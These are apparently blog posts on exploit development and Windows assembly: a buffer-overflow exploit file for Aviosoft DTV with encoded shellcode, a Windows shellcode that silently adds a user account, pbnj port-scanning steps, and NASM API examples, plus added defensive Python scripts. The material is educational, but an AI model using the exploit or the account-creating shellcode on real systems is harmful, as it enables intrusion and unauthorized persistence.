root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\0x0d\x1a\xff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)





Well, let's modify the script again and change the shellcode. The final, reliable working exploit is:

print "Creating exploit."
f = open("crash-me.PLF", "w")  # Create the file

push = "\x90" * 260         # Found by mona.py
eip = "\xab\xa7\x11\x64"    # EIP
junk = "\x90" * 500         # 500 NOPs before the real shellcode

# msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\0x0d\x1a\xff" -t c
shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
             "\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
             "\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
             "\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
             "\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
             "\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
             "\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
             "\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
             "\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
             "\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
             "\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
             "\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
             "\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
             "\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
             "\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
shellcode += "\x90" * 900   # Need enough junk, so NOPs instead of "A"

all = push + eip + junk + shellcode

try:
    f.write(all)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"



After regenerating "crash-me.PLF", open it in Aviosoft DTV and it will execute calc.exe. I did it in the debugger by pressing F9:



We can change the windows/exec shellcode at any time to a reverse shellcode which connects back to my specified IP address with a command shell.



The same exploit works on Windows 7 too:

This is because I used an EIP address from the application itself. If I had used an address from an OS DLL, of course the exploit would not work there (the advantage of the application's DLLs).


This is it!



Note: Exploit writing is much more about research. Without research it is not possible to be an exploit writer. If you have questions or advice, please comment here or mail me and I will try to answer (I love to discuss!).

If you want to learn more about exploit development in detail, read Corelan's tutorials at https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/. Much better than other commercial training :).






Port scanning using pbnj!

Recently I installed Kali Linux on VMware Workstation. There is a tool called pbnj which can scan ports and store the results in a MySQL database. Sometimes it is useful to store a vulnerability assessment in a database, but in Kali Linux it is not installed by default. pbnj uses nmap (with "-a [options]") to scan the network; I only use it to store the results in a database!

Let's see how to install it and use it to scan ports and store the results in a database:

root@find:~# apt-cache search pbnj
pbnj - a suite of tools to monitor changes on a network
root@find:~# apt-get install pbnj



Start the MySQL service on Kali Linux:


root@find:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..




Let's find all files related to pbnj:

root@find:~# updatedb;locate pbnj
/usr/bin/outputpbnj
/usr/bin/scanpbnj
/usr/share/doc/pbnj
/usr/share/doc/pbnj/BUGS
/usr/share/doc/pbnj/EXAMPLES
/usr/share/doc/pbnj/NOTES-ON-NMAP-VERSION
/usr/share/doc/pbnj/README.gz
/usr/share/doc/pbnj/changelog.Debian.gz
/usr/share/doc/pbnj/changelog.gz
/usr/share/doc/pbnj/copyright
/usr/share/doc/pbnj/examples
/usr/share/doc/pbnj/examples/csv.yaml
/usr/share/doc/pbnj/examples/mysql.yaml
/usr/share/doc/pbnj/examples/pg.yaml
/usr/share/doc/pbnj/examples/sqlite3.yaml
/usr/share/man/man1/outputpbnj.1p.gz
/usr/share/man/man1/scanpbnj.1p.gz
/var/cache/apt/archives/pbnj_2.04-4_all.deb
/var/lib/dpkg/info/pbnj.list
/var/lib/dpkg/info/pbnj.md5sums






I am going to use MySQL, so I am only interested in "/usr/share/doc/pbnj/examples/mysql.yaml". We need to edit this file to use the correct username, password and database:


root@find:~# cp /usr/share/doc/pbnj/examples/mysql.yaml ~/.pbnj-2.0/config.yaml;\
nano ~/.pbnj-2.0/config.yaml
# YAML:1.0
# Config for connecting to a DBI database
# SQLite, mysql etc
db: mysql
# for SQLite the name of the file. For mysql the name of the database
database: pbnjdb
# Username for the database. For SQLite no username is needed.
user: root
# Password for the database. For SQLite no password is needed.
passwd: ""
# Password for the database. For SQLite no host is needed.
host: localhost
# Port for the database. For SQLite no port is needed.
port: 3306


In Kali the MySQL password is blank and the username is "root". You should really change the username and password, but I am doing it without changing anything. So let's configure MySQL:


root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> create database pbnjdb;
Query OK, 1 row affected (0.00 sec)

mysql>



We are ready to go now:


root@find:~# scanpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.
Usage: scanpbnj [Options] {target specification}

Target Specification:
Can pass hostnames, IP addresses, networks, etc.
Ex: microsoft.com, 192.168.0.1, 192.168.1.1/24, 10.0.0.1-254
-i --iplist <iplist> Scan using a list of IPs from a file
-x --xml <xml-file> Parse scan/info from Nmap XML file

Scan Options:
-a --args <args> Execute Nmap with args (needs quotes)
-e --extraargs <args> Add args to the default args (needs quotes)
--inter <interface> Perform Nmap Scan using non default interface
-m --moreports <ports> Add ports to scan ex: 8080 or 3306,5900
-n --nmap <path> Path to Nmap executable
-p --pingscan Ping Target then scan the host(s) that are alive
--udp Add UDP to the scan arguments
--rpc Add RPC to the scan arguments
-r --range <ports> Ports for scan [def 1-1025]

--diffbanner Parse changes of the banner

Config Options:
-d --dbconfig <config> Config for results database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]
--dir <dir> Directory for SQLite or CSV file [def . ]

General Options:
--nocolors Don't Print Colors
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )



Now let's scan ports:


root@find:~# scanpbnj -a "-sS"  localhost
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.

--------------------------------------
Starting Scan of 127.0.0.1
Inserting Machine
Inserting Service on 3306:tcp mysql
Inserting Service on 5432:tcp postgresql
Scan Complete for 127.0.0.1
--------------------------------------



Above, the "-a" option passes the nmap argument "-sS". The scan finished, and hopefully the result was written to the database. Let's check:


root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 52
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use pbnjdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
->;
+------------------+
| Tables_in_pbnjdb |
+------------------+
| machines |
| services |
+------------------+
2 rows in set (0.00 sec)

mysql> select * from services;
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| mid | service | state | port | protocol | version | banner | machine_updated | updated_on |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| 12 | mysql | up | 3306 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
| 12 | postgresql | up | 5432 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
2 rows in set (0.00 sec)

mysql>



mysql> select * from machines;
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| mid | ip | host | localh | os | machine_created | created_on |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| 1 | 192.168.2.92 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 2 | 192.168.2.96 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 3 | 192.168.2.91 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 4 | 192.168.2.98 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 5 | 192.168.2.99 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 6 | 192.168.2.100 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 7 | 192.168.2.97 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 8 | 192.168.2.94 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 9 | 192.168.2.93 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 10 | 192.168.2.90 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 11 | 192.168.2.95 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 12 | 127.0.0.1 | localhost | 1 | unknown os | 1364339543 | Tue Mar 26 19:12:23 2013 |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
12 rows in set (0.00 sec)

mysql>


There is another tool installed, called outputpbnj, which can be used to dump the results without manually logging in to MySQL.


root@find:~# locate outputpbnj
/usr/bin/outputpbnj
/usr/share/man/man1/outputpbnj.1p.gz



root@find:~# outputpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Usage: outputpbnj [Query Options] [Config Options] [General Options]
Query Options:
-q --query <name> Perform sql query
-t --type <type> Output Type [csv,tab,html]
-f --file <filename> Store the result in file otherwise stdout
--both Print results and store them in a file
--dir <dir> Store the result in this directory [def .]

-l --lookup <name> Lookup descrition based on name
--list List of names and descriptions
-n --name Lookup all the names
-d --desc Lookup all the descriptions
-s --sql Lookup all the sql queries

Config Options:
--qconfig <file> Config of sql queries [def query.yaml]
--dbconfig <file> Config for accessing database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]

General Options:
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )



Okay, let's dump the latest result:
root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Error in option spec: "test|=s"
Error in option spec: "debug|=s"


wtf!

It is not working as expected. No problem, I am going to edit the "outputpbnj" Perl script: I have to remove the "|" from "test" and "debug". Kali Linux uses the Leafpad text editor, so run "leafpad /usr/bin/outputpbnj", or you can use gedit or kate/kwrite (KDE). Then search for "test|=s":



GetOptions(
\%options,
'type|t=s', 'file|f=s', 'lookup|l=s', 'both|b',
'query|q=s', 'names|n', 'desc|d', 'sql|s', 'list',
'dbconfig=s', 'configdir=s', 'dir=s', 'data=s', 'qconfig=s',
'test|=s', 'debug|=s',
'help|h' => sub { help(); },
'version|v' => sub { print_version(); },
'both' => sub { $bothOutput = 1 },
)
or exit 1;

Just remove the pipe "|" from "test" and "debug"; it should be 'test=s', 'debug=s'. Now save and run:


root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Tue Mar 26 19:12:23 2013 localhost mysql up unknown versiontcp
Tue Mar 26 19:12:23 2013 localhost postgresql up unknown version tcp



It is possible to save the output in a different format. For example:


root@find:~# mkdir pbnjr
root@find:~# outputpbnj -q latestinfo -t html -f pbnjr/report.html
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.

root@find:~# cd pbnjr
root@find:~/pbnjr# ls
report.html
root@find:~/pbnjr# iceweasel report.html
root@find:~/pbnjr#



Another curiosity: can I use only one query ("-q"), or are there more? There are many:
possiblevuln
sshmachines
allservices
services
unknown_version_up
unknown_banner_up
machines
mdump
servicesup
service_audit 


All the query names are available in the outputpbnj script (with descriptions)!



This kind of tool is really useful for vulnerability assessment. pbnj is a really nice tool.
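Since pbnj's stated purpose is to monitor changes on a network, the useful follow-up to the tables above is to compare two scans rather than read one. The script below is an added example and is not part of the pbnj project or of this post: it builds an in-memory sqlite3 database whose column names follow the "machines" and "services" tables shown above (the sqlite3 schema is a constructed approximation of pbnj's MySQL one), fills it with constructed rows for the first scan and a later rescan, and reports which services are new, gone or changed.

```python
# Added example (not from the original post or the pbnj project): detect
# changes between two scans using tables shaped like the ones pbnj creates.
import sqlite3

# Constructed approximation of pbnj's schema, column names as shown in the post.
SCHEMA = """
CREATE TABLE machines (
    mid INTEGER PRIMARY KEY, ip TEXT, host TEXT, localh INTEGER,
    os TEXT, machine_created INTEGER, created_on TEXT);
CREATE TABLE services (
    mid INTEGER, service TEXT, state TEXT, port INTEGER, protocol TEXT,
    version TEXT, banner TEXT, machine_updated INTEGER, updated_on TEXT);
"""

FIRST, SECOND = 1364339543, 1364425943  # first scan (as in the post) and a constructed rescan
MACHINES = [(12, "127.0.0.1", "localhost", 1, "unknown os", FIRST, "Tue Mar 26 19:12:23 2013")]
SERVICES = [  # constructed sample rows
    (12, "mysql",      "up", 3306, "tcp", "unknown version", "unknown product", FIRST,  "Tue Mar 26 19:12:23 2013"),
    (12, "postgresql", "up", 5432, "tcp", "unknown version", "unknown product", FIRST,  "Tue Mar 26 19:12:23 2013"),
    # rescan: mysql now reports a banner, and an ssh service appeared
    (12, "mysql",      "up", 3306, "tcp", "5.5.28",          "MySQL 5.5.28-1",  SECOND, "Wed Mar 27 19:12:23 2013"),
    (12, "postgresql", "up", 5432, "tcp", "unknown version", "unknown product", SECOND, "Wed Mar 27 19:12:23 2013"),
    (12, "ssh",        "up",   22, "tcp", "unknown version", "unknown product", SECOND, "Wed Mar 27 19:12:23 2013"),
]

def load_sample_db():
    """Build the in-memory database and fill it with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO machines VALUES (?,?,?,?,?,?,?)", MACHINES)
    db.executemany("INSERT INTO services VALUES (?,?,?,?,?,?,?,?,?)", SERVICES)
    return db

def scan_times(db, mid):
    """All scan timestamps recorded for one machine, oldest first."""
    return [t for (t,) in db.execute(
        "SELECT DISTINCT machine_updated FROM services WHERE mid = ? ORDER BY machine_updated", (mid,))]

def snapshot(db, mid, scan_time):
    """(port, protocol) -> (service, state, version, banner) for one scan of one machine."""
    rows = db.execute(
        "SELECT port, protocol, service, state, version, banner FROM services "
        "WHERE mid = ? AND machine_updated = ?", (mid, scan_time))
    return {(port, proto): (svc, state, ver, banner) for port, proto, svc, state, ver, banner in rows}

def diff_latest(db, mid):
    """Compare the two most recent scans of a machine: new, removed and changed services."""
    times = scan_times(db, mid)
    if len(times) < 2:
        return {"new": {}, "removed": {}, "changed": {}}
    before, after = snapshot(db, mid, times[-2]), snapshot(db, mid, times[-1])
    return {
        "new":     {k: after[k] for k in after.keys() - before.keys()},
        "removed": {k: before[k] for k in before.keys() - after.keys()},
        "changed": {k: (before[k], after[k]) for k in before.keys() & after.keys() if before[k] != after[k]},
    }

def report(db):
    """One line per difference, in the spirit of outputpbnj's latestinfo but limited to changes."""
    lines = []
    for mid, ip, host in db.execute("SELECT mid, ip, host FROM machines"):
        d = diff_latest(db, mid)
        for (port, proto), (svc, _state, _ver, _banner) in sorted(d["new"].items()):
            lines.append(f"{ip} ({host}): NEW {port}/{proto} {svc}")
        for (port, proto), (svc, _state, _ver, _banner) in sorted(d["removed"].items()):
            lines.append(f"{ip} ({host}): GONE {port}/{proto} {svc}")
        for (port, proto), (old, new) in sorted(d["changed"].items()):
            lines.append(f"{ip} ({host}): CHANGED {port}/{proto} banner {old[3]!r} -> {new[3]!r}")
    return lines

if __name__ == "__main__":
    for line in report(load_sample_db()):
        print(line)
```

Pointing `sqlite3.connect` at a real pbnj SQLite file (the sqlite3.yaml backend) or swapping in a MySQL driver with the same queries turns this into a change report over real scans; the grouping by `machine_updated` is what lets one table hold every scan's rows.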

(N)ASM windows MessageBox , import dll

Mostly I use NASM, GCC and LD for programming practice, because I use Linux as my primary operating system and I love to use cross-platform applications.

I am not an asm coder; in the past I searched a lot for an ASM (nasm) example of the MessageBox() function just to get started, because everything was fairly new to me (I had no clue!). So I decided to post a simple example, which was my first assembly program for Windows, in case someone is searching for a basic example to get started. I hope it will be useful to someone who is in the same situation as I was!


First Example:

extern _ExitProcess@4
extern _MessageBoxA@16

global _main

section .data
msgb db "pusheax.com!",0
title db "Security Research!",0
section .text

_main:

push dword 0x00
;mov esi,msgb
;push esi
push dword title
push dword msgb
push dword 0
call _MessageBoxA@16

push 0
call _ExitProcess@4

"extern" imports a symbol from another module. In our case the symbols are _ExitProcess@4 and _MessageBoxA@16. There are a few things to notice:

1. underscore before MessageBoxA .
2. @4/16 

The underscore is used for calling the function in C style; Linux does not have the underscore (_). The @4/@16 indicates how many bytes of parameters the called function takes. For example, MessageBox has 4 parameters; each parameter is 4 bytes, so 4 parameters are (4*4) 16 bytes, hence @16. The extra "A" is for ANSI-C.


"global _main" declares the entry point of our asm instructions (C style).



"section .data", you know what it is! It declares data such as variables.

In "section .text" (our code) all the parameters are pushed onto the stack in reverse order. I have called MessageBox (see here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx ). The MessageBox call in C would look like this:

MessageBox(NULL,msgb,title,0x00000000L)


In ASM it is the opposite:

First push 0x00000000L (MB_OK) onto the stack. It is now the top of the stack!
Then push "title". "title" is now the top of the stack.
Then push "msgb". Same as above: "msgb" (the string) is the top of the stack.
The last push is 0. Same as above.
Finally, call the function.

The stack is LIFO (last in, first out), so the call is now:

MessageBox(NULL,msgb,title,0x00000000L)

It is always a good idea to terminate the current process, so the ExitProcess() function is called once the MessageBox() operation has completed.

Compile the code:
nasm -fwin32 msg.asm
gcc msg.obj -o msg.exe
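The "@16" decoration and the reverse push order above are two sides of the same convention, stdcall. The following is an added example, not code from the post: a small Python model of a downward-growing 32-bit stack that pushes the MessageBox parameters right-to-left, shows what the callee sees at [esp+4], [esp+8], ... and then performs the "ret 16" cleanup that the @16 stands for. The string addresses and the return address are constructed values; no real process is involved.

```python
# Added example (not from the original post): a model of the 32-bit stdcall
# convention encoded by the _MessageBoxA@16 symbol. Addresses are constructed.
WORD = 4  # every parameter is one 4-byte stack slot

def decorate(name, nparams, word=WORD):
    """C-style stdcall decoration: _Name@<total bytes of parameters>."""
    return f"_{name}@{nparams * word}"

class Stack32:
    """Downward-growing stack: push lowers esp by 4 and stores the value there."""
    def __init__(self, esp=0x0012FF80):  # constructed starting esp
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= WORD
        self.mem[self.esp] = value

    def read(self, offset):
        """Read the dword at [esp + offset]."""
        return self.mem[self.esp + offset]

def call_stdcall(stack, params, return_address):
    """Push params right-to-left (exactly what the asm does), then emulate CALL,
    which pushes the return address. Returns the pushes in the order emitted."""
    pushes = list(reversed(params))
    for p in pushes:
        stack.push(p)
    stack.push(return_address)
    return pushes

def callee_view(stack, nparams):
    """What the called function sees: [esp] is the return address, [esp+4] the
    first parameter, [esp+8] the second, and so on in source order."""
    return [stack.read(WORD * (i + 1)) for i in range(nparams)]

def stdcall_return(stack, nparams):
    """RET <n>: pop the return address and discard the callee's parameters,
    the cleanup the @<n> in the symbol name promises the caller."""
    ret = stack.read(0)
    stack.esp += WORD * (nparams + 1)
    return ret

def demo():
    """MessageBox(NULL, msgb, title, MB_OK) as the post pushes it."""
    NULL, MB_OK = 0, 0
    MSGB, TITLE = 0x00402000, 0x0040200D   # constructed: "pusheax.com!\0" is 13 bytes
    st = Stack32()
    esp_before = st.esp
    pushes = call_stdcall(st, [NULL, MSGB, TITLE, MB_OK], return_address=0x00401024)
    seen = callee_view(st, 4)
    stdcall_return(st, 4)
    return pushes, seen, st.esp == esp_before

if __name__ == "__main__":
    print(decorate("MessageBoxA", 4), decorate("ExitProcess", 1))
    print(demo())
```

The last value returned by `demo()` is the point of the @16: after the callee's own `ret 16`, esp is back where it was before the first push, so the caller adds nothing. A cdecl function (no @n) would leave the four slots for the caller to remove.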


But I want to import a specific DLL, because not all DLLs are loaded, so some API functions may not work if I can't load the DLL in my code. How do I do this? "import MessageBoxA@16 user32.dll"? I think this is not going to work for me because nasm will not generate a win32 object file with it (perhaps an issue). So I need to work with the obj format (nasm -fobj msg.asm), but another issue is that gcc won't compile the obj file. I used ALINK (download: http://alink.sourceforge.net/); this is what we want instead of using gcc/LD (maybe)? But LD can still be used to compile it by linking the library with (-l). Here is the code I have assembled with nasm and compiled with alink.exe:



import MessageBoxA user32.dll ;Include the dll user32.dll
extern MessageBoxA ; Now calling the external symbol without underscore....

section .data
msgme db "Hi",0 ;Say "Hi" to pusheax.com

section .text use32 CLASS=CODE ;"use32 CLASS=CODE" tells the other linker (such as alink.exe) that the program is 32-bit

..start: ; ..start (not _start) is the start of the code for the other linker

push dword 0x00 ; MB_OK
mov esi,msgme ;esi="Hi"
push esi ;"Hi" is now top of the stack, second parameter: title
push dword msgme ; Say "Hi"
push dword 0 ;Reserved
call [MessageBoxA] ;Call the function

;nasm -fobj msg2.asm
;alink -oPE msg2.obj


If we use ld (with gcc) then our command should be "ld -o what.exe what.obj -luser32.dll", whereas with alink it is "alink -oPE what.obj" after assembling with nasm. For alink we don't need to declare how many parameters, the underscore etc., whereas for ld we need to declare all the required things and the extra option "-l" to link the DLL.

Which linker will you use?

My first shellcode was in two registers, The adduser shellcode!

I always tried to learn to write simple shellcode in assembly language. But writing shellcode was not my first interest; my interest was exploit writing. I had to learn to understand assembly language for various reasons, such as understanding how the computer works, using a debugger effectively, exploit writing, fun etc. So I searched Google a lot for "Writing shellcode" and fortunately found some amazing tutorials (see References!). I will explain each line of my first shellcode below. Before that, I want to tell you what tools I used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c


The shellcode:

;add user shellcode. Only will work on windows xp3. Written by pusheax.com 
[BITS 32]

global _start

section .text

_start:
jmp short command


function: ;Label
;WinExec("Command to execute",NULL)
pop ecx
xor eax,eax
push eax
push ecx
mov eax,0x7c8623ad
call eax

xor eax,eax
push eax
mov eax,0x7c81cafa
call eax



command: ;Label
call function
db "cmd.exe /c net user pusheax popebp /ADD"
db 0x00



So let me explain each line:

[BITS 32]: Tells nasm the code is for 32-bit.


global _start: Declares the main starting label.


section .text: Declares the code section.


jmp short command: the jmp instruction is used to jump to another label, called "command". A "call" instruction is not usable here because "call" saves the address of the next instruction on the stack in order to get back to it. This is a really common trick when writing shellcode. So it jumps to the "command" label and keeps no return address on the stack.



So now we are in the label "command", and it holds the following instructions:

call function: Calls the "function" label and saves the address of the next "instruction" (whatever it is) on the stack for the return. The next "instruction" is simply the system command string:

 db "cmd.exe /c net user pusheax popebp /ADD"



So, whatever the case, we are now in the label "function".
There is a simple Windows API we need to call, WinExec(), http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx . It only requires two parameters.

pop     ecx : Take the current return address into ecx and remove it from the stack.


xor     eax,eax : cleans the eax register to 0. We could directly push 0 onto the stack, but that would clearly produce null bytes, so most shellcoders use xor.


push     eax : pushes 0 onto the stack. Since the stack is LIFO, it will be the last parameter.

push     ecx : Do you remember that we popped an address into ecx? ecx is actually holding the address of "cmd.exe /c net user pusheax popebp /ADD", so we need to push it onto the stack as WinExec()'s first parameter. The stack now holds: WinExec("cmd.exe /c net user pusheax popebp /ADD",NULL).

mov     eax,0x7c8623ad : 0x7c8623ad is the address of WinExec(). We move this address into eax. I found this address using arwin.exe ( ./arwin.exe Kernel32.dll WinExec ).


call      eax : eax=WinExec(), so this executes the API function.


xor    eax,eax: clean the eax register, because we are going to terminate the current process soon. We are going to call the ExitProcess() function to exit the current process; otherwise the shellcode may get corrupted. You may see it in the debugger.

push   eax: as above, we push the last parameter onto the stack.


mov     eax,0x7c81cafa : as above, I used arwin to find the address of the ExitProcess() function.


call      eax: eax=ExitProcess's address. Calling eax executes the function.
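The jmp/call/pop construction explained above is also one of the easiest shellcode traits to spot in a byte stream, because a CALL whose target is a POP instruction has no purpose other than loading an address. The script below is an added example and not part of the post: it decodes the relative operands of EB (jmp short) and E8 (call) and flags a CALL that lands on a POP, together with the short jump that leads to it. The sample bytes are constructed from the post's instruction sequence, with placeholder immediates (0x11111111, 0x22222222) where the post has API addresses and a harmless string where it has a command.

```python
# Added example (not from the original post): find the jmp short / call / pop
# "get the address of my data" construction in a byte blob.
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # POP r32 = 0x58 + index

# Constructed sample: the post's layout with placeholder immediates and a harmless string.
SAMPLE = (
    b"\xeb\x16"                  # 0x00: jmp short +22 -> "command"
    b"\x59"                      # 0x02: pop ecx          ("function")
    b"\x31\xc0"                  # 0x03: xor eax,eax
    b"\x50"                      # 0x05: push eax
    b"\x51"                      # 0x06: push ecx
    b"\xb8\x11\x11\x11\x11"      # 0x07: mov eax, imm32   (placeholder)
    b"\xff\xd0"                  # 0x0c: call eax
    b"\x31\xc0"                  # 0x0e: xor eax,eax
    b"\x50"                      # 0x10: push eax
    b"\xb8\x22\x22\x22\x22"      # 0x11: mov eax, imm32   (placeholder)
    b"\xff\xd0"                  # 0x16: call eax
    b"\xe8\xe5\xff\xff\xff"      # 0x18: call -27 -> "function"  ("command")
    b"constructed string\x00"    # 0x1d: the data whose address the POP receives
)

def rel8_target(blob, i):
    """Target of the 2-byte 'jmp short' at offset i (rel8 is relative to the next instruction)."""
    return i + 2 + struct.unpack_from("<b", blob, i + 1)[0]

def rel32_target(blob, i):
    """Target of the 5-byte 'call rel32' at offset i."""
    return i + 5 + struct.unpack_from("<i", blob, i + 1)[0]

def find_call_pop(blob):
    """Every E8 whose target byte is a POP r32, plus the jmp short that reaches the CALL, if any."""
    hits = []
    for i in range(len(blob) - 4):
        if blob[i] != 0xE8:
            continue
        target = rel32_target(blob, i)
        if not 0 <= target < len(blob):
            continue
        op = blob[target]
        if 0x58 <= op <= 0x5F:
            hit = {"call_at": i, "target": target, "pop": "pop " + REGS[op - 0x58],
                   "backward": target < i, "jmp_from": None, "data_at": i + 5}
            for j in range(i):  # a jmp short landing exactly on the CALL completes the trick
                if blob[j] == 0xEB and rel8_target(blob, j) == i:
                    hit["jmp_from"] = j
            hits.append(hit)
    return hits

def describe(blob):
    out = []
    for h in find_call_pop(blob):
        line = "call at 0x%02x -> %s at 0x%02x%s" % (
            h["call_at"], h["pop"], h["target"], " (backward)" if h["backward"] else "")
        if h["jmp_from"] is not None:
            line += ", entered via jmp short at 0x%02x" % h["jmp_from"]
        out.append(line)
    return out

if __name__ == "__main__":
    for line in describe(SAMPLE):
        print(line)
```

The `data_at` field is the address the POP ends up holding: the bytes right after the CALL, which in the post is the command string. A matching jmp short whose target is the CALL, and a CALL whose displacement is negative, make the pattern much less likely to be a coincidence in ordinary code.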



Test

1. nasm -f bin -o shellcode.bin
2. ./xxd-shellcode.sh shellcode.bin
3. paste into the shellcode-test.c:
4. compile with mingw and execute, then check for the new user name :).



 Reference:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20



(N)ASM LoadLibrary,GetProcAddress and MessageBox!

When I was reading shellcode writing tutorials, LoadLibrary and GetProcAddress just confused me. But it was really easy to understand in normal asm code. It was a bit harder for me when I first tried to write a somewhat dynamic Windows shellcode. So, to understand dynamic DLL loading in shellcode, I first decided to learn to load the DLL dynamically in normal (n)asm code, and it was easy:


section .data

ldlibry dd 0
pro dd 0
dll db "user32.dll",0
myFtion db "MessageBoxA",0
MSG db "ASM GetProcAddress",0

extern _LoadLibraryA@4
extern _FreeLibrary@4
extern _GetProcAddress@8
extern _ExitProcess@4

global _start

section .text

_start:
push dll ;push user32.dll
call _LoadLibraryA@4 ;Call the API.
mov [ldlibry],eax ;eax holds the return value. So eax=LoadLibrary("user32.dll") and now ldlibry=LoadLibrary("user32.dll")

;now we need to call GetProcAddress

push myFtion ;The API name we are going to call
push eax ;LoadLibrary("user32.dll")
call _GetProcAddress@8 ;GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA"). Again eax holds the return value


push 0x0 ;MB_OK
push MSG ;TITLE="ASM GetProcAddress"
push MSG ;Message="ASM GetProcAddress"
